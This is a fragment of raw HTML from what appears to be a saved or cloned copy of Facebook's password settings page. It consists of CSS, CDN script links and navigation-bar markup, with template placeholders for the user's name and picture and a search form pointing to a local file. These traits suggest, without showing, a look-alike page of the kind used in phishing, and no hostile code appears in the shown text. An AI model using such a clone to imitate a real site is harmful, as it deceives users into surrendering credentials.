white;margin:0}._3hx- ._5yl5{font-size:13px;line-height:16px}._3hx- ._5wda{margin-left:0;margin-top:0}._3hx- ._5wdc{border:6px solid white;padding:0}._3hx- ._3njy ._4tdw{height:32px;width:32px}._3hx- ._3njy ._4tdw img{height:32px;vertical-align:bottom;width:32px}._3hx- ._1nc6 ._5wdc{border-right:5px solid white;margin-right:0}._3hx- ._5wdb{border-top:3px solid white;margin-top:0}._3hx- ._1nc6 ._5wdb{border-right:7px solid white;margin-right:0}._3hx- ._1nc7 ._5wdb{border-left:7px solid white;margin-left:0}._3hx- ._16ys._3e7u{margin-top:0}._3hx- ._16ys._3e7u{border-top:1px solid white;margin-top:0}._3hx- ._5wd4 ._59gq{border-bottom:3px solid white;border-left:6px solid white;border-right:5px solid white;border-top:4px solid white;padding:0}._3hx- ._5wd4 ._59gq i.img{border-right:6px solid white;margin-right:0}._3hx- ._1nc6 ._1e-x,._3hx- ._1nc6 ._3e7u{clear:none;float:none}._3hx- ._1nc7 ._1e-x._337n,._3hx- ._1nc6 ._1e-x._337n,._3hx- ._1nc7 ._3e7u._337n,._3hx- ._1nc6 ._3e7u._337n{border:12px solid white;padding:0}._3hx- ._40qi{align-items:center;background:white;display:flex;flex:1 1 0%;float:none;justify-content:flex-end}._3hx- ._1a6y{background:white}._3hx- ._3_bl{display:flex;flex-direction:row}[dir='rtl'] ._3hx- ._3_bl{flex-direction:row-reverse}._3hx- ._3_bp{background:white;display:block;flex-basis:0px;flex-grow:1;flex-shrink:1}._3hx- ._5ye6{background:white}._3hx- ._4tdt{border-bottom:10px solid white;border-left:8px solid white;border-right:18px solid white;border-top:10px solid white;margin:0}._3hx- ._ua1{background:white}._3__-._3hx- ._4tdt{border-right:18px solid white;margin-right:0}._3hx- ._4tdt:first-of-type{border-top:5px solid white;margin-top:0}._3hx- ._4tdt:last-of-type{border-bottom:5px solid white;margin-bottom:0}._3hx- ._4tdt ._4tdx{background:white;border-bottom:1px solid white;border-left:16px solid white;margin-bottom:0;margin-left:0}._3hx- ._31o4{background:white;border-right:10px solid white}._3hx- ._40fu{background:white}._3hx- ._1nc6 ._1e-x ._n4o{border-bottom:1px solid white;border-top:1px solid white;display:flex;flex-direction:row-reverse;position:relative}._3hx- ._1nc6 ._1e-x ._n4o:after{background:white;content:'';display:block;flex-basis:0%;flex-grow:1;flex-shrink:1}._3hx- ._n4o ._3_om ._1aa6,._3hx- ._n4o ._3_om ._1aa6:after{border-radius:36px}._3hx- ._1nc7 ._n4o ._3_om ._1aa6,._3hx- ._1nc7 ._n4o ._3_om ._1aa6:after{border-bottom-right-radius:47px;border-top-right-radius:47px}._3hx- ._1nc6 ._n4o ._3_om ._1aa6,._3hx- ._1nc6 ._n4o ._3_om ._1aa6:after{border-bottom-left-radius:47px;border-top-left-radius:47px}._3hx- ._1nc7 ._n4o ._4i_6 ._1aa6,._3hx- ._1nc7 ._n4o ._4i_6 ._1aa6:after{border-bottom-right-radius:47px}._3hx- ._1nc6 ._n4o ._4i_6 ._1aa6,._3hx- ._1nc6 ._n4o ._4i_6 ._1aa6:after{border-bottom-left-radius:47px}._3hx- ._1nc7:first-of-type ._n4o ._3_om ._1aa6,._3hx- ._1nc7:first-of-type ._n4o ._3_om ._1aa6:after{border-top-left-radius:47px}._3hx- ._1nc6:first-of-type ._n4o:first-of-type ._3_om ._1aa6,._3hx- ._1nc6:first-of-type ._n4o:first-of-type ._3_om ._1aa6:after{border-top-right-radius:47px}._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3_om ._1aa6,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._4i_6 ._1aa6,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3_om ._1aa6:after,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._4i_6 ._1aa6:after{border-bottom-left-radius:47px}._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3_om ._1aa6,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._4i_6 ._1aa6,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3_om ._1aa6:after,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._4i_6 ._1aa6:after{border-bottom-right-radius:47px}._3hx- ._n4o ._4yjw ._3_om ._1aa6,._3hx- ._1nc7:last-of-type ._n4o ._4yjw ._3_om ._1aa6,._3hx- ._1nc6:last-of-type ._n4o ._4yjw ._3_om ._1aa6,._3hx- ._n4o ._4yjw ._3_om ._1aa6:after,._3hx- ._1nc7:last-of-type ._n4o ._4yjw ._3_om ._1aa6:after,._3hx- ._1nc6:last-of-type ._n4o ._4yjw ._3_om ._1aa6:after{border-bottom-left-radius:0;border-bottom-right-radius:0}._3hx- ._3duc ._n4o._3_om._1wno ._1aa6,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3duc ._3_om ._1aa6,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3duc ._3_om ._1aa6,._3hx- ._3duc ._n4o._3_om._1wno ._1aa6:after,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3duc ._3_om ._1aa6:after,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3duc ._3_om ._1aa6:after{border-bottom-left-radius:0;border-bottom-right-radius:0}._3hx- ._1nc7 ._n4o ._3_om ._5_65 ._1aa6,._3hx- ._1nc7 ._n4o ._3_om ._5_65 ._1aa6:after{border-bottom-right-radius:47px}._3hx- ._1nc6 ._n4o ._3_om ._5_65 ._1aa6,._3hx- ._1nc6 ._n4o ._3_om ._5_65 ._1aa6:after{border-bottom-left-radius:47px}._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3_om ._5_65 ._1aa6,._3hx- ._1nc7:last-of-type ._n4o:last-of-type ._3_om ._5_65 ._1aa6:after{border-bottom-left-radius:47px}._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3_om ._5_65 ._1aa6,._3hx- ._1nc6:last-of-type ._n4o:last-of-type ._3_om ._5_65 ._1aa6:after{border-bottom-right-radius:47px}._3hx- ._1nc7 ._n4o ._3_om._1vmy._1vmy ._1aa6,._3hx- ._1nc7 ._n4o ._3_om._1vmy._1vmy ._1aa6:after{border-top-left-radius:2px}._3hx- ._1nc6 ._n4o ._3_om._1vmy._1vmy ._1aa6,._3hx- ._1nc6 ._n4o ._3_om._1vmy._1vmy ._1aa6:after{border-top-right-radius:2px}._3hx- ._5w-5{background:white;border-bottom:15px solid white;border-top:16px solid white;margin:0}._3hx- ._4yng{border:none;color:%23000;margin:0;position:relative}._3hx- ._4yng:after{border:1px solid %23f1c40f;bottom:0;content:'';display:block;left:-1px;position:absolute;right:-1px;top:0}._3hx- ._5z-5{border-bottom:10px solid white;margin-bottom:0}._3hx- ._1nc7:not(:last-of-type) ._5z-5,._3hx- ._1nc6:not(:last-of-type) ._5z-5,._3hx- ._3erg:not(:last-of-type) ._5z-5{border-bottom:18px solid white;margin-bottom:0}._3hx- ._5w0o{background:white;border-bottom:8px solid white;border-top:8px solid white;margin:0}._3hx- ._1nc6 ._5w1r{background-color:transparent}._3hx- ._1aa6{margin-bottom:-1px;margin-top:-1px;position:relative;z-index:0}.safari ._3hx- ._1aa6{border:1px solid transparent}._3hx- ._1aa6:after{border:30px solid white;bottom:-30px;content:'';display:block;left:-30px;pointer-events:none;position:absolute;right:-30px;top:-30px;z-index:3}._3hx- ._4a0v:after{border:30px solid white;border-radius:100px;bottom:-30px;content:'';display:block;left:-30px;pointer-events:none;position:absolute;right:-30px;top:-30px;z-index:3}._3hx- ._1aa6._31xy{background:white}._3hx- ._1nc6 ._1aa6._31xy{background:white}._3hx- ._5w1r._31xx{background:white}._3hx- .__nm._49ou .__6j{border-bottom:6px solid white;border-left:8px solid white;border-right:8px solid white;border-top:6px solid white;margin:6px 8px}._3hx- ._49or .__6j,._3hx- ._324d .__6j{border-bottom:4px solid white;border-left:4px solid white;border-right:6px solid white;border-top:4px solid white;margin-bottom:0;margin-left:0;margin-right:0;margin-top:0}._3hx- ._2eu_._llj{width:auto}._3hx- ._llj{background:white;border:12px solid white;margin-right:0;padding:0}._3hx- ._1nc6 ._1aa6{background-color:transparent}._3hx- ._3olv{opacity:1}._3hx- ._66n5 ._6b{vertical-align:initial}%23facebook ._3hx- ._1i6a ._2kwv{background:white;clip:unset;width:100%}._3hx- ._5wd4{border-bottom:1px solid white;padding-bottom:0}._3hx- ._3ry4{background-color:%23fff}._3hx- ._1zcs ._5wdf{color:rgba(255, 255, 255, .5);opacity:1}._3hx- ._5yn{background-color:%23fff;border-bottom:5px solid white;margin-bottom:0}._3hx- ._3cpq{background-color:%23fff;border-color:%23d1d1d1;overflow:hidden}._3hx- ._3cpq,._3hx- ._1wno,._3hx- ._52kr{border-radius:18px}._3hx- ._1nc7 ._n4o ._3cpq,._3hx- ._1nc7 ._n4o._1wno,._3hx- ._1nc7 ._52kr{border-bottom-left-radius:4px;border-top-left-radius:4px}._3hx- ._1nc7:first-of-type ._n4o ._3cpq,._3hx- ._1nc7:first-of-type ._n4o._1wno,._3hx- ._1nc7:first-of-type ._52kr{border-top-left-radius:18px}._3hx- ._1nc7:last-of-type ._n4o ._3cpq,._3hx- ._1nc7:last-of-type ._n4o._1wno,._3hx- ._1nc7:last-of-type ._52kr{border-bottom-left-radius:18px}._3hx- ._1nc6 ._n4o ._3cpq,._3hx- ._1nc6 ._n4o._1wno,._3hx- ._1nc6 ._52kr{border-bottom-right-radius:4px;border-top-right-radius:4px}._3hx- ._1nc6:first-of-type ._n4o ._3cpq,._3hx- ._1nc6:first-of-type ._n4o._1wno,._3hx- ._1nc6:first-of-type ._52kr{border-top-right-radius:18px}._3hx- ._1nc6:last-of-type ._n4o ._3cpq,._3hx- ._1nc6:last-of-type ._n4o._1wno,._3hx- ._1nc6:last-of-type ._52kr{border-bottom-right-radius:18px}._3hx- ._49ou._310t{padding-left:4px}%23bootloader_HDFmP{height:42px;}.bootloader_HDFmP{display:block!important;}" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/VAQat-EzIP2.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/ZtzYr1vkMT_.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ilNU4/yd/l/en_GB/rCSjx-dMoLm.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iSrv4/y2/l/en_GB/5LDNdUO45CH.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i5lF4/yb/l/en_GB/s5bDU37HgiS.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/r0ZsmxX2-z_.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/xFvpS6yMnIz.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iQ1q4/yV/l/en_GB/6j0VuY8JRAu.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iWuT4/yz/l/en_GB/QEI7abN72iF.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i-6f4/yh/l/en_GB/UYI8c-HY2IZ.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ihKy4/yA/l/en_GB/4IzGXbIsLVx.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iF584/yg/l/en_GB/DXbxZCwqcxv.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yN/r/9BIkSGz2P9D.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ie184/yg/l/en_GB/ffgEtNuzH-o.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iCJV4/yb/l/en_GB/qQzzZQ9QCfx.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/gPnaPO8aFmM.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/xYTiYXN51gv.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/cHaloIleOxq.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iX3c4/yA/l/en_GB/GBWBKOGrv0p.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/LqMiRipdJAD.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/t7AXh8F7koI.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yQ/l/0,cross/MLQEjrtA0Wp.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/3YS1Tf_RcsR.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i2Zz4/yp/l/en_GB/X6htJzz91AT.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iXTJ4/y8/l/en_GB/FAwoKxOEKHq.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/oZduTUM9Bub.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/ozTdtym0HT9.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/daarDMlWruC.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iU4h4/y-/l/en_GB/Z9Hwjl16PVh.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3izaH4/ya/l/en_GB/bkooa4U91Cu.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/1q7-t9f3S3N.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/R1lQDR3nFn_.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ine84/yq/l/en_GB/AuANspNxt3a.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/fWw5xjNRMS6.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ivcC4/yQ/l/en_GB/EgTG4_Zu8eg.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3itiF4/yR/l/en_GB/OG5recA7H1o.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/S-bc5kHo_EJ.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/Ch-IQ4IPjR4.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i3sq4/yD/l/en_GB/odQVW9Wjngg.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/Mk2QTmuqh7_.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/fK6hmVrEF8u.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/gGKzhbQUOf9.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ivrt4/yE/l/en_GB/EIAkilVhel1.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iH5q4/y-/l/en_GB/D8bQqmSlqkO.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i-s_4/y9/l/en_GB/czFJWi0q9ws.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iRAg4/yh/l/en_GB/l1MFyGfBaMA.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i7qE4/yW/l/en_GB/nJNU64Wx7f9.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/RdWPWcV6jHN.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iPCC4/yc/l/en_GB/zs7nVC8PlM1.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iBF04/yE/l/en_GB/ocG_p9iP4FI.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ikY14/yA/l/en_GB/LZrWtc8Ca8V.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yt/l/0,cross/uZajCsvINSZ.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/OgEd6O_mKzK.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/IZAT7-L2GHn.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iGbf4/y7/l/en_GB/7xH2UR9btUi.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/wzXSSeXTpQv.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/JlTUDDLZPVS.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iEI74/ya/l/en_GB/HJVdXBrgScb.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/vWlQkVBoMdv.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iWD04/y6/l/en_GB/hDQ_k8ekbFb.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3itGy4/yb/l/en_GB/SvrdI1aJQbu.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/ZKGR6UNoTMZ.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iMRL4/yh/l/en_GB/NkLmWdnSLt8.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3ibEk4/yP/l/en_GB/Mb_j-TElP39.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/UBTLycILYin.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iE9h4/ym/l/en_GB/Duj1HjHjIgL.js"> </script> <link crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/l/0,cross/zgqyBlcld0h.css" rel="stylesheet" type="text/css"/> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iXN04/yP/l/en_GB/2Uw7addDqK4.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/MonScOf6pbA.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i6Wg4/yx/l/en_GB/U58IwgJIq84.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iBY14/y5/l/en_GB/ifdzwNThybp.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3iFz-4/yS/l/en_GB/hRdOXz_Dy8F.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/Mr9rIC1hr_C.js"> </script> <script async="" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/WZuQVDBbO-T.js"> </script> </head> <body class="SettingsPage hasLeftCol fbx _-kb _61s0 _605a b_1mg4w6dbmp chrome webkit x1 Locale_en_GB _19_u cores-gte4 hasAXNavMenubar" dir="ltr"> <div class="_li" id="u_0_n"> <div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_o"> <div class="_608m"> <div class="_5aj7 _tb6"> <div class="_4bl7"> <span class="mrm _3bcv _50f3"> Jump to </span> </div> <div class="_4bl9 _3bcp"> <div aria-keyshortcuts="Alt+/" aria-label="Navigation assistant" class="_6a _608n" id="u_0_p" role="menubar"> <div class="_6a uiPopover" id="u_0_q"> <a aria-expanded="false" aria-haspopup="true" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" id="u_0_r" rel="toggle" role="menuitem" style="max-width:200px;"> <span class="_55pe"> Sections of this page </span> <span class="_4o_3 _3-99"> <i class="img sp_ks9jMipqQdl sx_e96203"> </i> </span> </a> </div> <div class="_6a mlm uiPopover" id="u_0_s"> <a aria-expanded="false" aria-haspopup="true" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" id="u_0_t" rel="toggle" role="menuitem" style="max-width:200px;" tabindex="-1"> <span class="_55pe"> Other pages on Facebook </span> <span class="_4o_3 _3-99"> <i class="img sp_ks9jMipqQdl sx_e96203"> </i> </span> </a> </div> <div class="_6a _3bcs"> </div> <div class="_6a mrm uiPopover" id="u_0_u"> <a aria-expanded="false" aria-haspopup="true" class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" id="u_0_v" rel="toggle" role="menuitem" style="max-width:200px;" tabindex="-1"> <span class="_55pe"> Accessibility help </span> <span class="_4o_3 _3-99"> <i class="img sp_ks9jMipqQdl sx_60d259"> </i> </span> </a> </div> </div> </div> <div class="_4bl7 mlm pll _3bct"> <div class="_6a _3bcy"> Press <span class="_3bcz"> alt </span> + <span class="_3bcz"> / </span> to open this menu </div> </div> </div> </div> </div> <div data-referrer="pagelet_bluebar" id="pagelet_bluebar"> <div class="_21dp" id="blueBarDOMInspector"> <div class="_2t-8 _1s4v _2s1x" id="bluebarRoot"> <div aria-label="Facebook" class="_2t-a _26aw _5rmj _50ti _2s1y" id="js_0" role="banner"> <div class="_2t-a _50tj"> <div class="_2t-a _4pmj _2t-d"> <div class="_2t-e"> <div class="_4kny"> <h1 class="_19ea" data-click="bluebar_logo"> <a class="_19eb" data-gt='{"chrome_nav_item":"logo_chrome"}' href="https://www.facebook.com/?ref=logo"> <span class="_2md"> Facebook </span> </a> </h1> </div> <div class="_4kny _50tm"> <div aria-label="Facebook" class="_585-" data-testid="facebar_root" role="search"> <form action="ref.html" class="" method="post"> <button aria-label="Search" class="_42ft _4jy0 _4w98 _4jy3 _517h _51sy" data-testid="facebar_search_button" tabindex="-1" type="submit" value="1"> <i class="_585_"> </i> </button> <div class="uiTypeahead _5860" data-ft='{"tn":"+Q"}' id="u_p_1"> <div class="wrap"> <input autocomplete="off" class="hiddenInput" type="hidden"/> <div class="innerWrap"> <div class="_5861 navigationFocus textInput _5eaz" id="u_p_2"> <input aria-hidden="1" class="_5eay" disabled="1" type="text"/> <input aria-autocomplete="list" aria-controls="typeahead_list_u_p_1" aria-expanded="false" aria-label="Search" autocomplete="off" class="_1frb" data-testid="search_input" name="q" placeholder="Search" role="combobox" type="text" value=""/> </div> </div> </div> </div> </form> </div> </div> </div> <div aria-label="Facebook" class="_2t-f" id="u_0_e" role="navigation"> <div class="_cy6"> <div class="_4kny"> <div class="_1k67 _cy7" data-click="profile_icon"> <a accesskey="2" class="_2s25 _606w" data-gt='{"chrome_nav_item":"timeline_chrome"}' href="https://www.facebook.com/me" title="Profile"> <span class="_1qv9"> <img alt="" class="_2qgu _7ql _1m6h img" id="profile_pic_header_100022900869586" src="[PIC]"/> <span class="_1vp5">[FIRSTNAME]</span> </span> </a> </div> </div> <span id="u_0_f"> </span> <div class="_4kny _2s24"> <div class="_3qcu _cy7" data-click="home_icon" id="u_0_g"> <a accesskey="1" class="_2s25" data-gt='{"chrome_nav_item":"home_chrome"}' href="https://www.facebook.com/?ref=tn_tnmn"> Home </a> </div> </div> <div class="_4kny _2s24"> <div class="_cy7"> <a class="_2s25" data-gt='{"chrome_nav_item":"find_friends_chrome"}' href="https://www.facebook.com/?sk=ff" id="findFriendsNav"> Find Friends </a> </div> </div> </div> <div class="_cy6 _2s24"> <div class="_4kny"> <div class="uiToggle _4962 _3nzl _24xk" data-toggle-wc="1" id="fbRequestsJewel"> <a aria-labelledby="u_0_7" class="jewelButton _3eoa" data-gt='{"ua_id":"jewel:requests"}' data-hover="tooltip" data-target="fbRequestsFlyout" data-tooltip-content="Friend requests" data-tooltip-delay="500" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" name="requests" rel="toggle" role="button"> <div class="_2n_9"> <span class="jewelCount" id="u_0_7"> <span class="_51lp hidden_elem _3z_5 _5ugh" id="requestsCountValue"> 0 </span> <i class="accessible_elem"> Friend requests </i> </span> </div> </a> <div aria-labelledby="fbRequestsJewelHeader" class="__tw toggleTargetClosed _3nzk uiToggleFlyout" id="fbRequestsFlyout" role="dialog"> <div class="beeperNub"> </div> <ul class="jewelItemList _3nzp" id="fbRequestsList"> <li> <div data-referrer="fbRequestsList_wrapper" id="fbRequestsList_wrapper"> <div id="fbRequestsJewelLoading"> <div id="fbRequestsJewelLoadingContent"> <div class="uiHeader uiHeaderBottomBorder jewelHeader requestsUnitTitle"> <div class="clearfix uiHeaderTop"> <div class="rfloat _ohf"> <h3 class="accessible_elem" id="fbRequestsJewelHeader"> Friend Requests </h3> <div class="requestsJewelLinks uiHeaderActions"> <div class="fsm fwn fcg"> <a accesskey="3" href="https://www.facebook.com/?sk=ff"> Find Friends </a> <span aria-hidden="true" role="presentation"> · </span> <a ajaxify="/ajax/settings/granular_privacy/can_friend.php" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="dialog" role="button"> Settings </a> </div> </div> </div> <div> <h3 aria-hidden="true" class="uiHeaderTitle"> <a href="https://www.facebook.com/friends/requests/?fcref=jwl"> Friend Requests </a> </h3> </div> </div> </div> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo jewelLoading" role="progressbar"> </span> </div> <div class="jewelFooter"> <a class="seeMore" href="https://www.facebook.com/friends/requests/?fcref=jwl"> <span> View all </span> </a> </div> </div> </div> </li> </ul> </div> </div> </div> <div class="_4kny"> <div class="uiToggle _4962 _1z4y _330i _4kgv" data-toggle-wc="1" id="u_0_h"> <a aria-labelledby="u_0_a" class="jewelButton _3eo8" data-gt='{"ua_id":"jewel:mercurymessages"}' data-hover="tooltip" data-tooltip-content="Messages" data-tooltip-delay="500" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" id="js_12e" name="mercurymessages" rel="toggle" role="button"> <div class="_2n_9 f_click"> <span class="jewelCount" id="u_0_a"> <span class="_51lp _3z_5 _5ugh hidden_elem" id="mercurymessagesCountValue"> 0 </span> <i class="accessible_elem"> Messages </i> </span> </div> </a> <div aria-labelledby="fbMercuryJewelHeader" class="__tw toggleTargetClosed _1y2l uiToggleFlyout" role="dialog"> <div class="beeperNub"> </div> <div class="uiHeader uiHeaderBottomBorder jewelHeader"> <div class="clearfix uiHeaderTop"> <div class="rfloat _ohf"> <h3 class="accessible_elem" id="fbMercuryJewelHeader"> Messages </h3> <div class="uiHeaderActions fsm fwn fcg"> <div class="_el8"> <a class="_el8" data-onclick='[["MessengerGCFJewelNewGroupButtonInit","onLinkClick"]]' href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button" tabindex="0"> New group </a> </div> <span aria-hidden="true" role="presentation"> · </span> <a accesskey="m" ajaxify="/ajax/messaging/composer.php" href="https://www.facebook.com/messages/new/" id="u_0_i" rel="dialog" role="button"> New Message </a> </div> </div> <div> <h3 aria-hidden="true" class="uiHeaderTitle"> <div> <a class="_1sdi _1sde _1sdd mrm" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> Recent <span class="_1sdj _1sdg"> (13) </span> </a> <a class="_1sdi _1v8t _1sdf" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> Message Requests <span class="_1sdj _1sdh"> </span> </a> </div> </h3> </div> </div> </div> <div class="_3v_l"> <div class="_2q3u uiScrollableArea fade uiScrollableAreaWithShadow" height="440" style="height: 440px;"> <div class="uiScrollableAreaWrap scrollable" id="js_ym"> <div class="uiScrollableAreaBody"> <div 